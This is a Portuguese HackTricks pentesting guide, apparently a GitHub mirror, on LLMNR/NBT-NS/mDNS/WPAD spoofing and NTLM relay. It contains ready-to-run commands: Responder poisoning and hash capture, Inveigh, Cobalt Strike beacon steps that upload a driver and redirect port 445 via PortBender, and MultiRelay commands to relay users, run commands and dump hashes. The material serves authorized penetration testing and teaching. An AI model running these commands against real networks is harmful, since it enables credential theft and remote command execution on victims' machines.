mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-19 01:24:50 +00:00
141 lines
9.6 KiB
Markdown
141 lines
9.6 KiB
Markdown
# Falsificação de LLMNR, NBT-NS, mDNS/DNS e WPAD e Ataques de Relevo
|
|
|
|
<details>
|
|
|
|
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Outras formas de apoiar o HackTricks:
|
|
|
|
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
|
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|
|
|
|
## Protocolos de Rede
|
|
|
|
### Protocolos de Resolução de Host Local
|
|
- **LLMNR, NBT-NS e mDNS**:
|
|
- A Microsoft e outros sistemas operacionais usam LLMNR e NBT-NS para resolução de nomes locais quando o DNS falha. Da mesma forma, os sistemas Apple e Linux usam mDNS.
|
|
- Esses protocolos são suscetíveis a interceptação e falsificação devido à sua natureza de difusão não autenticada sobre UDP.
|
|
- O [Responder](https://github.com/lgandx/Responder) pode ser usado para se passar por serviços enviando respostas falsificadas para hosts que consultam esses protocolos.
|
|
- Mais informações sobre a falsificação de serviços usando o Responder podem ser encontradas [aqui](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).
|
|
|
|
### Protocolo de Descoberta Automática de Proxy da Web (WPAD)
|
|
- O WPAD permite que os navegadores descubram automaticamente as configurações de proxy.
|
|
- A descoberta é facilitada via DHCP, DNS, ou recorrendo ao LLMNR e NBT-NS se o DNS falhar.
|
|
- O Responder pode automatizar ataques WPAD, direcionando clientes para servidores WPAD maliciosos.
|
|
|
|
### Responder para Envenenamento de Protocolo
|
|
- **Responder** é uma ferramenta usada para envenenar consultas LLMNR, NBT-NS e mDNS, respondendo seletivamente com base em tipos de consulta, visando principalmente serviços SMB.
|
|
- Ele vem pré-instalado no Kali Linux, configurável em `/etc/responder/Responder.conf`.
|
|
- O Responder exibe hashes capturados na tela e os salva no diretório `/usr/share/responder/logs`.
|
|
- Ele suporta IPv4 e IPv6.
|
|
- A versão do Windows do Responder está disponível [aqui](https://github.com/lgandx/Responder-Windows).
|
|
|
|
#### Executando o Responder
|
|
- Para executar o Responder com as configurações padrão: `responder -I <Interface>`
|
|
- Para sondagem mais agressiva (com efeitos colaterais potenciais): `responder -I <Interface> -P -r -v`
|
|
- Técnicas para capturar desafios/respostas NTLMv1 para facilitar a quebra: `responder -I <Interface> --lm --disable-ess`
|
|
- A falsificação do WPAD pode ser ativada com: `responder -I <Interface> --wpad`
|
|
- As solicitações NetBIOS podem ser resolvidas para o IP do atacante, e um proxy de autenticação pode ser configurado: `responder.py -I <interface> -Pv`
|
|
|
|
### Envenenamento DHCP com Responder
|
|
- Falsificar respostas DHCP pode envenenar permanentemente as informações de roteamento de uma vítima, oferecendo uma alternativa mais furtiva ao envenenamento ARP.
|
|
- Requer conhecimento preciso da configuração da rede alvo.
|
|
- Executando o ataque: `./Responder.py -I eth0 -Pdv`
|
|
- Este método pode capturar efetivamente hashes NTLMv1/2, mas requer manuseio cuidadoso para evitar interrupções na rede.
|
|
|
|
### Capturando Credenciais com Responder
|
|
- O Responder se passará por serviços usando os protocolos mencionados acima, capturando credenciais (geralmente Desafio/Resposta NTLMv2) quando um usuário tenta autenticar-se contra os serviços falsificados.
|
|
- Tentativas podem ser feitas para rebaixar para NetNTLMv1 ou desativar ESS para facilitar a quebra de credenciais.
|
|
|
|
É crucial observar que a aplicação dessas técnicas deve ser feita de forma legal e ética, garantindo autorização adequada e evitando interrupções ou acesso não autorizado.
|
|
|
|
## Inveigh
|
|
|
|
Inveigh é uma ferramenta para testadores de penetração e equipes vermelhas, projetada para sistemas Windows. Oferece funcionalidades semelhantes ao Responder, realizando falsificação e ataques de homem no meio. A ferramenta evoluiu de um script PowerShell para um binário C#, com [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) e [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero) como as principais versões. Parâmetros e instruções detalhadas podem ser encontrados na [**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters).
|
|
|
|
Inveigh pode ser operado através do PowerShell:
|
|
```powershell
|
|
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
|
|
```
|
|
Ou executado como um binário C#:
|
|
```bash
|
|
Inveigh.exe
|
|
```
|
|
### Ataque de Relevo NTLM
|
|
|
|
Este ataque aproveita sessões de autenticação SMB para acessar uma máquina alvo, concedendo um shell de sistema se bem-sucedido. Pré-requisitos-chave incluem:
|
|
- O usuário autenticado deve ter acesso de Administrador Local no host de retransmissão.
|
|
- A assinatura SMB deve estar desativada.
|
|
|
|
#### Encaminhamento e Tunelamento da Porta 445
|
|
|
|
Em cenários onde a introdução direta na rede não é viável, o tráfego na porta 445 precisa ser encaminhado e tunelado. Ferramentas como [**PortBender**](https://github.com/praetorian-inc/PortBender) ajudam a redirecionar o tráfego da porta 445 para outra porta, o que é essencial quando o acesso de administrador local está disponível para carregamento de driver.
|
|
|
|
Configuração e operação do PortBender no Cobalt Strike:
|
|
```bash
|
|
Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)
|
|
|
|
beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
|
|
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
|
|
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
|
|
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
|
|
beacon> socks 1080 # Establish a SOCKS proxy on port 1080
|
|
|
|
# Termination commands
|
|
beacon> jobs
|
|
beacon> jobkill 0
|
|
beacon> rportfwd stop 8445
|
|
beacon> socks stop
|
|
```
|
|
### Outras Ferramentas para Ataque de Revezamento NTLM
|
|
|
|
- **Metasploit**: Configurado com proxies, detalhes do host local e remoto.
|
|
- **smbrelayx**: Um script Python para retransmissão de sessões SMB e execução de comandos ou implantação de backdoors.
|
|
- **MultiRelay**: Uma ferramenta da suíte Responder para retransmitir usuários específicos ou todos os usuários, executar comandos ou extrair hashes.
|
|
|
|
Cada ferramenta pode ser configurada para operar por meio de um proxy SOCKS, se necessário, permitindo ataques mesmo com acesso de rede indireto.
|
|
|
|
### Operação do MultiRelay
|
|
|
|
O MultiRelay é executado a partir do diretório _**/usr/share/responder/tools**_, visando IPs ou usuários específicos.
|
|
```bash
|
|
python MultiRelay.py -t <IP target> -u ALL # Relay all users
|
|
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
|
|
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes
|
|
|
|
# Proxychains for routing traffic
|
|
```
|
|
### Forçar Logins NTLM
|
|
|
|
No Windows, **você pode ser capaz de forçar algumas contas privilegiadas a se autenticarem em máquinas arbitrárias**. Leia a seguinte página para aprender como:
|
|
|
|
{% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %}
|
|
[printers-spooler-service-abuse.md](../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md)
|
|
{% endcontent-ref %}
|
|
|
|
## Referências
|
|
* [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)
|
|
* [https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/)
|
|
* [https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/](https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/)
|
|
* [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)
|
|
* [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)
|
|
|
|
|
|
<details>
|
|
|
|
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Outras maneiras de apoiar o HackTricks:
|
|
|
|
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
|
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|